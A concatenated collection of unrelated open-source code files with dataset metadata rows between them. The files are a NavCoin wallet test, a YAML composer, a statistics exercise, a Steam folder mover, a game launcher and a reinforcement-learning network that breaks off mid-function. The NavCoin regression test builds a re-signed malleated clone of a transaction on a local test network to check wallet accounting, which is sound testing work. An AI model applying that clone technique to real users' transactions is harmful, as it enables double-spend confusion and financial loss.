def constraint(self, PreNode, graph):
"""
Executable constraint code.
@param PreNode: Function taking an integer as parameter
and returns the node corresponding to that label.
"""
#===============================================================================
# This code is executed after the nodes in the LHS have been matched.
# You can access a matched node labelled n by: PreNode('n').
# To access attribute x of node n, use: PreNode('n')['x'].
# The given constraint must evaluate to a boolean expression:
# returning True enables the rule to be applied,
# returning False forbids the rule from being applied.
#===============================================================================
return True
| mit | 5,550,988,573,478,345,000 | 51.788889 | 125 | 0.470375 | false |
navcoindev/navcoin-core | qa/rpc-tests/txn_clone.py | 1 | 7549 | #!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test proper accounting with an equivalent malleability clone
#
from test_framework.test_framework import NavCoinTestFramework
from test_framework.util import *
class TxnMallTest(NavCoinTestFramework):
def __init__(self):
super().__init__()
self.num_nodes = 4
self.setup_clean_chain = False
def add_options(self, parser):
parser.add_option("--mineblock", dest="mine_block", default=False, action="store_true",
help="Test double-spend of 1-confirmed transaction")
def setup_network(self):
# Start with split network:
return super(TxnMallTest, self).setup_network(True)
def run_test(self):
# All nodes should start with 1,250 NAV:
starting_balance = 1250
for i in range(4):
assert_equal(self.nodes[i].getbalance(), starting_balance)
self.nodes[i].getnewaddress("") # bug workaround, coins generated assigned to first getnewaddress!
# Assign coins to foo and bar accounts:
self.nodes[0].settxfee(.001)
node0_address_foo = self.nodes[0].getnewaddress("foo")
fund_foo_txid = self.nodes[0].sendfrom("", node0_address_foo, 1219)
fund_foo_tx = self.nodes[0].gettransaction(fund_foo_txid)
node0_address_bar = self.nodes[0].getnewaddress("bar")
fund_bar_txid = self.nodes[0].sendfrom("", node0_address_bar, 29)
fund_bar_tx = self.nodes[0].gettransaction(fund_bar_txid)
assert_equal(self.nodes[0].getbalance(""),
starting_balance - 1219 - 29 + fund_foo_tx["fee"] + fund_bar_tx["fee"])
# Coins are sent to node1_address
node1_address = self.nodes[1].getnewaddress("from0")
# Send tx1, and another transaction tx2 that won't be cloned
txid1 = self.nodes[0].sendfrom("foo", node1_address, 40, 0)
txid2 = self.nodes[0].sendfrom("bar", node1_address, 20, 0)
# Construct a clone of tx1, to be malleated
rawtx1 = self.nodes[0].getrawtransaction(txid1,1)
clone_inputs = [{"txid":rawtx1["vin"][0]["txid"],"vout":rawtx1["vin"][0]["vout"]}]
clone_outputs = {rawtx1["vout"][0]["scriptPubKey"]["addresses"][0]:rawtx1["vout"][0]["value"],
rawtx1["vout"][1]["scriptPubKey"]["addresses"][0]:rawtx1["vout"][1]["value"]}
clone_locktime = rawtx1["locktime"]
clone_raw = self.nodes[0].createrawtransaction(clone_inputs, clone_outputs, clone_locktime)
# createrawtransaction randomizes the order of its outputs, so swap them if necessary.
# output 0 is at version+#inputs+input+sigstub+sequence+#outputs
# 40 NAV serialized is 00286bee00000000
pos0 = 2*(4+1+36+1+4+1)
hex40 = "00286bee00000000"
output_len = 16 + 2 + 2 * int("0x" + clone_raw[pos0 + 16 : pos0 + 16 + 2], 0)
if (rawtx1["vout"][0]["value"] == 40 and clone_raw[pos0 : pos0 + 16] != hex40 or
rawtx1["vout"][0]["value"] != 40 and clone_raw[pos0 : pos0 + 16] == hex40):
output0 = clone_raw[pos0 : pos0 + output_len]
output1 = clone_raw[pos0 + output_len : pos0 + 2 * output_len]
clone_raw = clone_raw[:pos0] + output1 + output0 + clone_raw[pos0 + 2 * output_len:]
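# Offset arithmetic used above, spelled out (illustrative): version (4 bytes) +
# input count (1) + outpoint (36) + empty scriptSig stub (1) + sequence (4) +
# output count (1) = 47 bytes, i.e. 2 * 47 = 94 hex chars before output 0; each
# output is the 8-byte little-endian value (40 NAV = 4,000,000,000 satoshi =
# "00286bee00000000") followed by a scriptPubKey whose length byte is parsed to
# find where output 0 ends.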
# Use a different signature hash type to sign. This creates an equivalent but malleated clone.
# Don't send the clone anywhere yet
tx1_clone = self.nodes[0].signrawtransaction(clone_raw, None, None, "ALL|ANYONECANPAY")
assert_equal(tx1_clone["complete"], True)
# Have node0 mine a block, if requested:
if (self.options.mine_block):
self.nodes[0].generate(1)
sync_blocks(self.nodes[0:2])
tx1 = self.nodes[0].gettransaction(txid1)
tx2 = self.nodes[0].gettransaction(txid2)
# Node0's balance should be starting balance, plus 50NAV for another
# matured block, minus tx1 and tx2 amounts, and minus transaction fees:
expected = starting_balance + fund_foo_tx["fee"] + fund_bar_tx["fee"]
if self.options.mine_block: expected += 50
expected += tx1["amount"] + tx1["fee"]
expected += tx2["amount"] + tx2["fee"]
assert_equal(self.nodes[0].getbalance(), expected)
# foo and bar accounts should be debited:
assert_equal(self.nodes[0].getbalance("foo", 0), 1219 + tx1["amount"] + tx1["fee"])
assert_equal(self.nodes[0].getbalance("bar", 0), 29 + tx2["amount"] + tx2["fee"])
if self.options.mine_block:
assert_equal(tx1["confirmations"], 1)
assert_equal(tx2["confirmations"], 1)
# Node1's "from0" balance should be both transaction amounts:
assert_equal(self.nodes[1].getbalance("from0"), -(tx1["amount"] + tx2["amount"]))
else:
assert_equal(tx1["confirmations"], 0)
assert_equal(tx2["confirmations"], 0)
# Send clone and its parent to miner
self.nodes[2].sendrawtransaction(fund_foo_tx["hex"])
txid1_clone = self.nodes[2].sendrawtransaction(tx1_clone["hex"])
# ... mine a block...
self.nodes[2].generate(1)
# Reconnect the split network, and sync chain:
connect_nodes(self.nodes[1], 2)
self.nodes[2].sendrawtransaction(fund_bar_tx["hex"])
self.nodes[2].sendrawtransaction(tx2["hex"])
self.nodes[2].generate(1) # Mine another block to make sure we sync
sync_blocks(self.nodes)
# Re-fetch transaction info:
tx1 = self.nodes[0].gettransaction(txid1)
tx1_clone = self.nodes[0].gettransaction(txid1_clone)
tx2 = self.nodes[0].gettransaction(txid2)
# Verify expected confirmations
assert_equal(tx1["confirmations"], -2)
assert_equal(tx1_clone["confirmations"], 2)
assert_equal(tx2["confirmations"], 1)
# Check node0's total balance; should be same as before the clone, + 100 NAV for 2 matured,
# less possible orphaned matured subsidy
expected += 100
if (self.options.mine_block):
expected -= 50
assert_equal(self.nodes[0].getbalance(), expected)
assert_equal(self.nodes[0].getbalance("*", 0), expected)
# Check node0's individual account balances.
# "foo" should have been debited by the equivalent clone of tx1
assert_equal(self.nodes[0].getbalance("foo"), 1219 + tx1["amount"] + tx1["fee"])
# "bar" should have been debited by (possibly unconfirmed) tx2
assert_equal(self.nodes[0].getbalance("bar", 0), 29 + tx2["amount"] + tx2["fee"])
# "" should have starting balance, less funding txes, plus subsidies
assert_equal(self.nodes[0].getbalance("", 0), starting_balance
- 1219
+ fund_foo_tx["fee"]
- 29
+ fund_bar_tx["fee"]
+ 100)
# Node1's "from0" account balance
assert_equal(self.nodes[1].getbalance("from0", 0), -(tx1["amount"] + tx2["amount"]))
if __name__ == '__main__':
TxnMallTest().main()
| mit | -8,845,441,044,191,796,000 | 46.477987 | 111 | 0.592794 | false |
croxis/SpaceDrive | spacedrive/renderpipeline/rplibs/yaml/yaml_py3/composer.py | 1 | 5020 |
__all__ = ['Composer', 'ComposerError']
from .error import MarkedYAMLError
from .events import *
from .nodes import *
class ComposerError(MarkedYAMLError):
pass
class Composer:
def __init__(self):
self.anchors = {}
def check_node(self):
# Drop the STREAM-START event.
if self.check_event(StreamStartEvent):
self.get_event()
# If there are more documents available?
return not self.check_event(StreamEndEvent)
def get_node(self):
# Get the root node of the next document.
if not self.check_event(StreamEndEvent):
return self.compose_document()
def get_single_node(self):
# Drop the STREAM-START event.
self.get_event()
# Compose a document if the stream is not empty.
document = None
if not self.check_event(StreamEndEvent):
document = self.compose_document()
# Ensure that the stream contains no more documents.
if not self.check_event(StreamEndEvent):
event = self.get_event()
raise ComposerError("expected a single document in the stream",
document.start_mark, "but found another document",
event.start_mark)
# Drop the STREAM-END event.
self.get_event()
return document
def compose_document(self):
# Drop the DOCUMENT-START event.
self.get_event()
# Compose the root node.
node = self.compose_node(None, None)
# Drop the DOCUMENT-END event.
self.get_event()
self.anchors = {}
return node
def compose_node(self, parent, index):
if self.check_event(AliasEvent):
event = self.get_event()
anchor = event.anchor
if anchor not in self.anchors:
raise ComposerError(None, None, "found undefined alias %r"
% anchor, event.start_mark)
return self.anchors[anchor]
event = self.peek_event()
anchor = event.anchor
if anchor is not None:
if anchor in self.anchors:
raise ComposerError("found duplicate anchor %r; first occurence"
% anchor, self.anchors[anchor].start_mark,
"second occurence", event.start_mark)
self.descend_resolver(parent, index)
if self.check_event(ScalarEvent):
node = self.compose_scalar_node(anchor)
elif self.check_event(SequenceStartEvent):
node = self.compose_sequence_node(anchor)
elif self.check_event(MappingStartEvent):
node = self.compose_mapping_node(anchor)
self.ascend_resolver()
return node
def compose_scalar_node(self, anchor):
event = self.get_event()
tag = event.tag
if tag is None or tag == '!':
tag = self.resolve(ScalarNode, event.value, event.implicit)
node = ScalarNode(tag, event.value,
event.start_mark, event.end_mark, style=event.style)
if anchor is not None:
self.anchors[anchor] = node
return node
def compose_sequence_node(self, anchor):
start_event = self.get_event()
tag = start_event.tag
if tag is None or tag == '!':
tag = self.resolve(SequenceNode, None, start_event.implicit)
node = SequenceNode(tag, [],
start_event.start_mark, None,
flow_style=start_event.flow_style)
if anchor is not None:
self.anchors[anchor] = node
index = 0
while not self.check_event(SequenceEndEvent):
node.value.append(self.compose_node(node, index))
index += 1
end_event = self.get_event()
node.end_mark = end_event.end_mark
return node
def compose_mapping_node(self, anchor):
start_event = self.get_event()
tag = start_event.tag
if tag is None or tag == '!':
tag = self.resolve(MappingNode, None, start_event.implicit)
node = MappingNode(tag, [],
start_event.start_mark, None,
flow_style=start_event.flow_style)
if anchor is not None:
self.anchors[anchor] = node
while not self.check_event(MappingEndEvent):
#key_event = self.peek_event()
item_key = self.compose_node(node, None)
#if item_key in node.value:
# raise ComposerError("while composing a mapping", start_event.start_mark,
# "found duplicate key", key_event.start_mark)
item_value = self.compose_node(node, item_key)
#node.value[item_key] = item_value
node.value.append((item_key, item_value))
end_event = self.get_event()
node.end_mark = end_event.end_mark
return node
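# Usage sketch (illustrative): Composer is one mix-in of the loader stack, so it is
# normally exercised through a composed loader rather than instantiated directly, e.g.
#   loader = Loader("- 1\n- 2\n")    # any Loader class built on Composer
#   node = loader.get_single_node()  # -> SequenceNode containing two ScalarNodes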
| mit | 6,579,740,711,259,711,000 | 34.115108 | 89 | 0.564343 | false |
acimmarusti/isl_exercises | chap4/chap4ex13.py | 1 | 5743 | from __future__ import print_function, division
import matplotlib.pyplot as plt
import numpy as np
import scipy
import pandas as pd
import seaborn as sns
from sklearn.datasets import load_boston
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.neighbors import KNeighborsClassifier
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis, QuadraticDiscriminantAnalysis
from sklearn.metrics import confusion_matrix, accuracy_score, precision_score, recall_score
from pandas.tools.plotting import scatter_matrix
import statsmodels.formula.api as smf
import statsmodels.api as sm
#Load boston dataset from sklearn#
boston = load_boston()
#Columns#
#print(boston['feature_names'])
#Description#
#print(boston['DESCR'])
rawdata = pd.DataFrame(boston.data, columns=boston.feature_names)
rawdata['MEDV'] = boston.target
#Convert to NaN#
data = rawdata.replace(to_replace='None', value=np.nan).copy()
#Create the binary variable CRIM01#
data['CRIM01'] = np.where(data['CRIM'] > data['CRIM'].median(), 1, 0)
#Columns#
numcols = list(data.columns)
numcols.remove('CRIM')
#Predictor without target columns#
xcols = list(numcols)
xcols.remove('CRIM01')
#Summary (mean, stdev, range, etc)#
print('\nFull data summary')
print(data.describe())
#Correlations#
print('\nData correlations')
dcorrs = data.corr()
print(dcorrs)
#Pair plot matrix#
#sns.set()
#sns.pairplot(data[numcols], hue='CRIM01')
print('\n\n### LOGISTIC REGRESSION###')
## Logistic regression with statsmodels ##
plr_form = 'CRIM01~' + '+'.join(xcols)
prelogreg = smf.glm(formula=plr_form, data=data, family=sm.families.Binomial()).fit()
#Remove predictors with high P-values from LogReg#
logit_pvals = prelogreg.pvalues
pred_keep = list(logit_pvals[logit_pvals < 0.05].index)
pred_keep.remove('Intercept')
print('\nAfter first LogReg iteration, keeping only: ', pred_keep)
# New LogReg with only low p-value predictors#
lr_form = 'CRIM01~' + '+'.join(pred_keep)
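# e.g. if pred_keep ended up as ['ZN', 'NOX', 'DIS', 'RAD'] (it depends on the fitted
# p-values), lr_form would be the patsy-style formula string 'CRIM01~ZN+NOX+DIS+RAD'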
logreg = smf.glm(formula=lr_form, data=data, family=sm.families.Binomial()).fit()
print('\nLogistic regression fit summary')
print(logreg.summary())
#Splitting the data for train/test#
X_data = data[pred_keep]
Y_data = data['CRIM01']
X_train, X_test, Y_train, Y_test = train_test_split(X_data, Y_data, test_size=0.5, random_state=42, stratify=Y_data)
# Initiate logistic regression object
logit_clf = LogisticRegression()
# Fit model. Let X_train = matrix of predictors, Y_train = matrix of variables.
resLogit_clf = logit_clf.fit(X_train, Y_train)
#Predicted values for training set
Y_pred_logit = resLogit_clf.predict(X_test)
#Confusion matrix#
print("\nConfusion matrix logit:")
print(confusion_matrix(Y_test, Y_pred_logit))
#Accuracy, precision and recall#
print('\nAccuracy logit:', np.round(accuracy_score(Y_test, Y_pred_logit), 3))
print("Precision logit:", np.round(precision_score(Y_test, Y_pred_logit, pos_label=1), 3))
print("Recall logit:", np.round(recall_score(Y_test, Y_pred_logit, pos_label=1), 3))
print('\n\n### LINEAR DISCRIMINANT ANALYSIS ###')
# Initiate linear discriminant analysis object
lda_clf = LinearDiscriminantAnalysis()
# Fit model. Let X_train = matrix of new_pred, Y_train = matrix of variables.
reslda_clf = lda_clf.fit(X_train, Y_train)
#Predicted values for training set
Y_pred_lda = reslda_clf.predict(X_test)
#Prior probabilities#
print("\nPrior probabilities")
print(reslda_clf.classes_)
print(reslda_clf.priors_)
#Group means#
print("\nGroup means")
#print(reslda_clf.classes_)
print(reslda_clf.means_)
#Coefficients#
print("\nCoefficients")
#print(reslda_clf.classes_)
print(reslda_clf.intercept_)
print(reslda_clf.coef_)
#Confusion matrix#
print("\nConfusion matrix LDA:")
print(confusion_matrix(Y_test, Y_pred_lda))
#Accuracy, precision and recall#
print("\nAccuracy LDA:", np.round(accuracy_score(Y_test, Y_pred_lda), 3))
print("Precision LDA:", np.round(precision_score(Y_test, Y_pred_lda, pos_label=1), 3))
print("Recall LDA:", np.round(recall_score(Y_test, Y_pred_lda, pos_label=1), 3))
print('\n\n### QUADRATIC DISCRIMINANT ANALYSIS ###')
# Initiate QDA object
qda_clf = QuadraticDiscriminantAnalysis()
# Fit model. Let X_train = matrix of new_pred, Y_train = matrix of variables.
resqda_clf = qda_clf.fit(X_train, Y_train)
#Predicted values for training set
Y_pred_qda = resqda_clf.predict(X_test)
#Prior probabilities#
print("\nPrior probabilities")
print(resqda_clf.classes_)
print(resqda_clf.priors_)
#Group means#
print("\nGroup means")
#print(resqda_clf.classes_)
print(resqda_clf.means_)
#Confusion matrix#
print("\nConfusion matrix QDA:")
print(confusion_matrix(Y_test, Y_pred_qda))
#Accuracy, precision and recall#
print("\nAccuracy QDA:", np.round(accuracy_score(Y_test, Y_pred_qda), 3))
print("Precision QDA:", np.round(precision_score(Y_test, Y_pred_qda, pos_label=1), 3))
print("Recall QDA:", np.round(recall_score(Y_test, Y_pred_qda, pos_label=1), 3))
print('\n\n### K NEAREST NEIGHBORS ###')
#K value#
kval = 15
print('\nUsing k = ' + str(kval))
# Initiate KNN object
knn_clf = KNeighborsClassifier(n_neighbors=kval)
# Fit model. Let X_train = matrix of new_pred, Y_train = matrix of variables.
resknn_clf = knn_clf.fit(X_train, Y_train)
#Predicted values for training set
Y_pred_knn = resknn_clf.predict(X_test)
#Confusion matrix#
print("\nConfusion matrix KNN:")
print(confusion_matrix(Y_test, Y_pred_knn))
#Accuracy, precision and recall#
print("\nAccuracy KNN:", np.round(accuracy_score(Y_test, Y_pred_knn), 3))
print("Precision KNN:", np.round(precision_score(Y_test, Y_pred_knn, pos_label=1), 3))
print("Recall KNN:", np.round(recall_score(Y_test, Y_pred_knn, pos_label=1), 3))
#plt.show()
| gpl-3.0 | 2,730,287,095,568,599,000 | 28.756477 | 116 | 0.737768 | false |
benopotamus/steam-game-mover | main.py | 1 | 4905 | #!/usr/bin/env python
'''Allows easy moving (with symlinking) of folders to and from the SteamApps folder.
Intended for users with an SSD that cannot hold all their Steam games. It lets them easily move games that are not currently being played to a slower drive, and move them back at a later date. The symlinking means the games can still be played regardless of which drive they are on.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import os, wx
import layout, Model
from wx.lib.pubsub import Publisher as pub
class Frame(layout.MainFrame):
'''The UI was built with wxFormBuilder (layout.MainFrame), so subclass it and override the necessary methods and attributes.'''
def __init__(self, parent):
super( Frame, self ).__init__(parent)
#### The following binds/subscribes controller functions to model broadcasts ####
# These will all just take the broadcast and update the view/widgets from layout.py
pub.subscribe(self.primary_path_changed, "PRIMARY PATH CHANGED")
pub.subscribe(self.secondary_path_changed, "SECONDARY PATH CHANGED")
pub.subscribe(self.games_move_to_secondary, "GAMES MOVED TO SECONDARY")
pub.subscribe(self.games_move_to_primary, "GAMES MOVED TO PRIMARY")
pub.subscribe(self.display_move_dialog, "MOVING GAMES")
pub.subscribe(self.window_size_changed, "WINDOW SIZE CHANGED")
pub.subscribe(self.window_coords_changed, "WINDOW COORDS CHANGED")
pub.subscribe(self.use_default_window_size, "NO SIZE FOUND")
# Model is created after subscriptions because it broadcasts on instantiation (when it gets settings from config file)
self.model = Model.Model()
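# Illustrative flow: Model.change_primary_path(path) broadcasts "PRIMARY PATH CHANGED",
# pubsub delivers it to primary_path_changed() below, which updates the button label and
# the left listbox -- the view never touches the filesystem itself.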
#### The following 'on' methods are bound to the widgets in layout.py ####
def on_games_move( self, event ):
if event.GetEventObject().GetName() == 'move_to_secondary_button':
games = self.left_listbox.GetSelectionsStrings()
self.model.move_games_to_secondary(games)
elif event.GetEventObject().GetName() == 'move_to_primary_button':
games = self.right_listbox.GetSelectionsStrings()
self.model.move_games_to_primary(games)
event.Skip()
def on_change_primary_dir_choice(self, event):
# In this case we include a "New directory" button.
dlg = wx.DirDialog(self, "Choose a directory:", style=wx.DD_DEFAULT_STYLE)
if dlg.ShowModal() == wx.ID_OK:
self.model.change_primary_path(dlg.GetPath())
# Only destroy a dialog after we're done with it
dlg.Destroy()
def on_change_secondary_dir_choice(self, event):
# In this case we include a "New directory" button.
dlg = wx.DirDialog(self, "Choose a directory:", style=wx.DD_DEFAULT_STYLE)
if dlg.ShowModal() == wx.ID_OK:
self.model.change_secondary_path(dlg.GetPath())
# Only destroy a dialog after we're done with it
dlg.Destroy()
def on_frame_close( self, event ):
''' Save window position and size on close'''
self.model.change_window_size(self.GetSize())
self.model.change_window_coords(self.GetPosition())
event.Skip()
#### Broadcast response methods ####
def primary_path_changed(self,message):
self.primary_dir_choice_button.SetLabel(message.data['path'])
self.left_listbox.SetItems(message.data['path_folders'])
def secondary_path_changed(self,message):
self.secondary_dir_choice_button.SetLabel(message.data['path'])
self.right_listbox.SetItems(message.data['path_folders'])
def games_move_to_secondary(self,message):
self.left_listbox.SetItems(message.data['primary_path_folders'])
self.right_listbox.SetItems(message.data['secondary_path_folders'])
# Same method for games_move_to_primary
games_move_to_primary = games_move_to_secondary
def window_size_changed(self,message):
self.SetSize(message.data)
def window_coords_changed(self,message):
self.SetPosition(message.data)
def use_default_window_size(self,message):
self.Fit()
def display_move_dialog(self, message):
'''When model broadcasts games are being moved, creates a file moving (progress) dialog'''
self.progress_dialog = layout.Moving_progress_dialog(self, message.data['initial_path'], message.data['final_path'], message.data['game_names'])
class App(wx.App):
def OnInit(self):
self.frame = Frame(parent=None)
self.frame.Show()
self.SetTopWindow(self.frame)
return True
if __name__ == '__main__':
app = App()
app.MainLoop()
| gpl-2.0 | -7,643,176,816,354,137,000 | 37.320313 | 287 | 0.733741 | false |
FOSSRIT/lemonade-stand | LemonadeStand.py | 1 | 1785 | #!/usr/bin/env python
from fortuneengine.GameEngine import GameEngine
from LemonadeMain import LemonadeMain
from LemonadeGui import LemonadeGui
from optparse import OptionParser
from pygame import font
parser = OptionParser()
parser.add_option("", "--width", dest="width", help="window width",
metavar="WIDTH", default=1200, type="int")
parser.add_option("", "--height", dest="height", help="window height",
metavar="HEIGHT", default=855, type="int")
parser.add_option("-f", "--font", dest="font", help="font size",
metavar="SIZE", default=36, type="int")
parser.add_option("", "--shopFont", dest="shopFont", help="shop font size",
metavar="SHOPSIZE", default="48", type="int")
parser.add_option("", "--shopNumFont", dest="shopNumFont",
help="shop number font size", metavar="SHOPNUMSIZE",
default="72", type="int")
parser.add_option("", "--menuFont", dest="menuFont", help="menu font",
metavar="MENUFONT", default="90", type="int")
parser.add_option("-d", "--difficulty", dest="difficulty",
help="difficulty level", metavar="DIFFICULTY",
default=0, type="int")
(opts, args) = parser.parse_args()
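# Example invocation (illustrative): ./LemonadeStand.py --width 800 --height 600 -f 24 -d 1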
ge = GameEngine(width=opts.width, height=opts.height, always_draw=False)
ge.add_object('font', font.SysFont(font.get_default_font(), opts.font))
ge.add_object('shopFont', font.SysFont(font.get_default_font(), opts.shopFont))
ge.add_object('shopNumFont', font.SysFont(font.get_default_font(),
opts.shopNumFont))
ge.add_object('menuFont', font.SysFont(font.get_default_font(), opts.menuFont))
ge.add_object('main', LemonadeMain(opts.difficulty))
ge.add_object('gui', LemonadeGui())
ge.start_main_loop()
| gpl-3.0 | 6,978,417,313,381,393,000 | 39.568182 | 79 | 0.648179 | false |
andzaytsev/deepnav | GA3C/NetworkVP.py | 1 | 12801 | # Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of NVIDIA CORPORATION nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import re
import numpy as np
import tensorflow as tf
from Config import Config
class NetworkVP:
def __init__(self, device, model_name, num_actions):
self.device = device
self.model_name = model_name
self.num_actions = num_actions
self.img_width = Config.IMAGE_WIDTH
self.img_height = Config.IMAGE_HEIGHT
self.img_channels = Config.IMAGE_DEPTH * Config.STACKED_FRAMES
self.learning_rate = Config.LEARNING_RATE_START
self.beta = Config.BETA_START
self.log_epsilon = Config.LOG_EPSILON
self.graph = tf.Graph()
with self.graph.as_default() as g:
with tf.device(self.device):
self._create_graph()
self.sess = tf.Session(
graph=self.graph,
config=tf.ConfigProto(
allow_soft_placement=True,
log_device_placement=False,
gpu_options=tf.GPUOptions(allow_growth=True)))
self.sess.run(tf.global_variables_initializer())
if Config.TENSORBOARD: self._create_tensor_board()
if Config.LOAD_CHECKPOINT or Config.SAVE_MODELS:
vars = tf.global_variables()
self.saver = tf.train.Saver({var.name: var for var in vars}, max_to_keep=0)
def _create_graph(self):
self.x = tf.placeholder(
tf.float32, [None, self.img_height, self.img_width, self.img_channels], name='X')
self.y_r = tf.placeholder(tf.float32, [None], name='Yr')
self.var_beta = tf.placeholder(tf.float32, name='beta', shape=[])
self.var_learning_rate = tf.placeholder(tf.float32, name='lr', shape=[])
self.global_step = tf.Variable(0, trainable=False, name='step')
# As implemented in A3C paper
self.n1 = self.conv2d_layer(self.x, 8, 16, 'conv11', strides=[1, 4, 4, 1])
self.n2 = self.conv2d_layer(self.n1, 4, 32, 'conv12', strides=[1, 2, 2, 1])
self.action_index = tf.placeholder(tf.float32, [None, self.num_actions])
_input = self.n2
flatten_input_shape = _input.get_shape()
nb_elements = flatten_input_shape[1] * flatten_input_shape[2] * flatten_input_shape[3]
self.flat = tf.reshape(_input, shape=[-1, nb_elements._value])
self.d1 = self.dense_layer(self.flat, 256, 'dense1')
self.logits_v = tf.squeeze(self.dense_layer(self.d1, 1, 'logits_v', func=None), axis=[1])
self.cost_v = 0.5 * tf.reduce_sum(tf.square(self.y_r - self.logits_v), axis=0)
self.logits_p = self.dense_layer(self.d1, self.num_actions, 'logits_p', func=None)
if Config.USE_LOG_SOFTMAX:
self.softmax_p = tf.nn.softmax(self.logits_p)
self.log_softmax_p = tf.nn.log_softmax(self.logits_p)
self.log_selected_action_prob = tf.reduce_sum(self.log_softmax_p * self.action_index, axis=1)
self.cost_p_1 = self.log_selected_action_prob * (self.y_r - tf.stop_gradient(self.logits_v))
self.cost_p_2 = -1 * self.var_beta * \
tf.reduce_sum(self.log_softmax_p * self.softmax_p, axis=1)
else:
self.softmax_p = (tf.nn.softmax(self.logits_p) + Config.MIN_POLICY) / (1.0 + Config.MIN_POLICY * self.num_actions)
self.selected_action_prob = tf.reduce_sum(self.softmax_p * self.action_index, axis=1)
self.cost_p_1 = tf.log(tf.maximum(self.selected_action_prob, self.log_epsilon)) \
* (self.y_r - tf.stop_gradient(self.logits_v))
self.cost_p_2 = -1 * self.var_beta * \
tf.reduce_sum(tf.log(tf.maximum(self.softmax_p, self.log_epsilon)) *
self.softmax_p, axis=1)
self.cost_p_1_agg = tf.reduce_sum(self.cost_p_1, axis=0)
self.cost_p_2_agg = tf.reduce_sum(self.cost_p_2, axis=0)
self.cost_p = -(self.cost_p_1_agg + self.cost_p_2_agg)
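        # Summary of the A3C objective built above: cost_v is the squared-error
        # critic loss; cost_p_1 is the policy-gradient term log pi(a|s) weighted
        # by the advantage (y_r - V(s)), with the value estimate held constant
        # via stop_gradient; cost_p_2 is the entropy bonus scaled by beta that
        # discourages premature convergence to a deterministic policy. cost_p is
        # negated because the optimizers below minimize.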
if Config.DUAL_RMSPROP:
self.opt_p = tf.train.RMSPropOptimizer(
learning_rate=self.var_learning_rate,
decay=Config.RMSPROP_DECAY,
momentum=Config.RMSPROP_MOMENTUM,
epsilon=Config.RMSPROP_EPSILON)
self.opt_v = tf.train.RMSPropOptimizer(
learning_rate=self.var_learning_rate,
decay=Config.RMSPROP_DECAY,
momentum=Config.RMSPROP_MOMENTUM,
epsilon=Config.RMSPROP_EPSILON)
else:
self.cost_all = self.cost_p + self.cost_v
self.opt = tf.train.RMSPropOptimizer(
learning_rate=self.var_learning_rate,
decay=Config.RMSPROP_DECAY,
momentum=Config.RMSPROP_MOMENTUM,
epsilon=Config.RMSPROP_EPSILON)
if Config.USE_GRAD_CLIP:
if Config.DUAL_RMSPROP:
self.opt_grad_v = self.opt_v.compute_gradients(self.cost_v)
self.opt_grad_v_clipped = [(tf.clip_by_norm(g, Config.GRAD_CLIP_NORM),v)
for g,v in self.opt_grad_v if not g is None]
self.train_op_v = self.opt_v.apply_gradients(self.opt_grad_v_clipped)
self.opt_grad_p = self.opt_p.compute_gradients(self.cost_p)
self.opt_grad_p_clipped = [(tf.clip_by_norm(g, Config.GRAD_CLIP_NORM),v)
for g,v in self.opt_grad_p if not g is None]
self.train_op_p = self.opt_p.apply_gradients(self.opt_grad_p_clipped)
self.train_op = [self.train_op_p, self.train_op_v]
else:
self.opt_grad = self.opt.compute_gradients(self.cost_all)
self.opt_grad_clipped = [(tf.clip_by_average_norm(g, Config.GRAD_CLIP_NORM),v) for g,v in self.opt_grad]
self.train_op = self.opt.apply_gradients(self.opt_grad_clipped)
else:
if Config.DUAL_RMSPROP:
                self.train_op_v = self.opt_v.minimize(self.cost_v, global_step=self.global_step)
                self.train_op_p = self.opt_p.minimize(self.cost_p, global_step=self.global_step)
self.train_op = [self.train_op_p, self.train_op_v]
else:
self.train_op = self.opt.minimize(self.cost_all, global_step=self.global_step)
def _create_tensor_board(self):
summaries = tf.get_collection(tf.GraphKeys.SUMMARIES)
summaries.append(tf.summary.scalar("Pcost_advantage", self.cost_p_1_agg))
summaries.append(tf.summary.scalar("Pcost_entropy", self.cost_p_2_agg))
summaries.append(tf.summary.scalar("Pcost", self.cost_p))
summaries.append(tf.summary.scalar("Vcost", self.cost_v))
summaries.append(tf.summary.scalar("LearningRate", self.var_learning_rate))
summaries.append(tf.summary.scalar("Beta", self.var_beta))
for var in tf.trainable_variables():
summaries.append(tf.summary.histogram("weights_%s" % var.name, var))
summaries.append(tf.summary.histogram("activation_n1", self.n1))
